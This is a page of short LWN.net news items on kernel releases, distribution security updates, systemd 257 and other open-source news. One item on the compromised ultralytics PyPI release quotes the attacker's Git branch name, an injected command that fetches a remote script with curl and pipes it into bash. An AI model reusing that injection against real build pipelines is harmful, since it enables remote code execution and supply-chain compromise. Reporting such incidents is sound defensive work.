~lwn | Bookmarks (361)

The Red Hat Enterprise Linux (RHEL) 10 beta was released in mid-November and, if all goes according to plan, CentOS Stream 10 should be released before the end of the year. While nothing is etched in stone just yet, it is a good time for anyone using or targeting RHEL (and its clones) to start taking a look at how Stream 10, and the corresponding EPEL repository,...

Greg Kroah-Hartman has released version 6.6.65 of the kernel: This release only fixes a build regression for openrisc, and a runtime regression for domU guests. If you don't have problems with them, no need to upgrade.

The Linux kernel has many tunable parameters. While there is much advice available on the internet about how to set them, few people have the time to weed through the (often contradictory) explanations and choose appropriate values. One possible way to address this is a project called bpftune, a program that uses BPF to track various metrics about a running system and adjust the...

Security updates have been issued by Debian (proftpd-dfsg and smarty3), Fedora (python3.14), Gentoo (Distrobox, eza, idna, libvirt, and OpenSC), Red Hat (container-tools:rhel8 and edk2), SUSE (avahi, curl, libsoup2, lxd, nodejs20, python-Django, python310-Django4, python312, squid, and webkit2gtk3), and Ubuntu (expat, intel-microcode, linux, linux-aws, linux-kvm, linux-lts-xenial, and shiro).

Systemd 257 has been released. As usual, the list of changes is long; it includes support for multipath TCP in socket units, the ability to run processes as init in their own PID namespace, a new tool for signing EFI binaries for secure boot, and a superhero emoji in the run0 shell prompt, among many other things. Also, support for version-1 control groups has...

Fedora Project Leader (FPL) Matthew Miller writes that he will soon be hanging up the FPL hat: Stay tuned for a job posting from Red Hat, and details about all that. I'm hoping we can hire someone awesome early in 2025, and make the official handover on the release of auspiciously-numbered Fedora Linux 42. I'm not going to leave Fedora, though. As I said...

In a session at Open Source Summit Europe (OSSEU) back in September, Alex Bucknall gave an overview of a camera "trap"—a device to capture images in a non-intrusive way—that he helped develop which is being used to monitor seagrass. He works for the Arribada Initiative, which is a non-profit organization focused on creating open-source technology for studying wildlife and ecosystems. The camera system uses...

Version 1.0.0 of the GNU Shepherd service manager has been released after a mere 21 years of development. This 1.0.0 release is published today because we think Shepherd has become a solid tool, meeting user experience standards one has come to expect since systemd changed the game of free init systems and service managers alike. It's also a major milestone for Guix, which has been...

Security updates have been issued by AlmaLinux (postgresql:15, postgresql:16, and ruby:3.1), Debian (jinja2), Fedora (python-multipart, python-python-multipart, python3.12, retsnoop, rust-rbspy, rust-rustls, and zabbix), Oracle (kernel, libsoup, postgresql:12, postgresql:13, postgresql:15, postgresql:16, redis:7, and ruby:3.1), SUSE (nodejs18, pam, qt6-webengine, and radare2), and Ubuntu (dogtag-pki, linux-intel-iotg, linux-intel-iotg-5.15, ofono, rabbitmq-server, and webkit2gtk).

When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until...

In 2019, the Python community had a lengthy discussion about changing the rules (that some find counterintuitive) on using break, continue, or return statements in finally blocks. These are all ways of jumping out of a finally block, which can interrupt the handling of a raised exception. At the time, the Python developers chose not to change things, because the consensus was that the...

The OpenWrt project has issued an advisory regarding a vulnerability found in its Attended Sysupgrade Server that could allow compromised packages to be installed on a router by an attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installed images created with an instance of this server are recommended to reinstall. For a...

The 6.12.4 and 6.6.64 stable kernels have been released, each with a set of important fixes throughout the kernel tree, as usual.

The 6.13-rc2 kernel prepatch is out for testing. "The diffstat looks a bit unusual with 80%+ drivers, and a lot of it one-liners, but that's actually just because of a couple of automated scripts that got run after -rc1 for some cleanups. Nothing particularly interesting, but it makes for a lot of noise in the diff." One of those scripts was the EXPORT_SYMBOL_NS() change...

Security updates have been issued by AlmaLinux (redis:7, ruby, ruby:2.5, and ruby:3.1), Debian (avahi, ceph, chromium, gsl, jinja2, php7.4, renderdoc, ruby-doorkeeper, and zabbix), Fedora (chromium, python3.11, and uv), Gentoo (Asterisk, Cacti, Chromium, Google Chrome, Microsoft Edge. Opera, Dnsmasq, firefox, HashiCorp Consul, icinga2, OATH Toolkit, OpenJDK, PostgreSQL, R, Salt, Spidermonkey, and thunderbird), Mageia (kubernetes), Red Hat (grafana, grafana-pcp, osbuild-composer, and postgresql), SUSE (ansible-core, firefox, glib2,...

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its...

Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.

The page structure sits at the core of the kernel's memory-management subsystem (for now), and a key part of that structure is its reference count, stored in refcount. The page reference count tells the kernel how many users a given page has and when it can be freed. That count is not needed for every page in the system, though. Matthew Wilcox has recently...

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more. Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for...

In July, Let's Encrypt announced it was ending support "as soon as possible" for the Online Certificate Status Protocol (OCSP) in favor of Certificate Revocation Lists (CRLs) due to privacy concerns. The organization has now announced that it has set a timeline, and will be turning off its OCSP responders on August 6, 2025. There is additional action required for Let's Encrypt users who use...

System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN...

It has long been said that naming things is one of the hard things to do in computer science. That may be so, but it pales in comparison to the challenge of handling usernames properly in applications. This is especially true when multiple applications are involved, and they are all supposed to agree on what characters are, and are not, allowed. The Debian project...

Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort: We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy...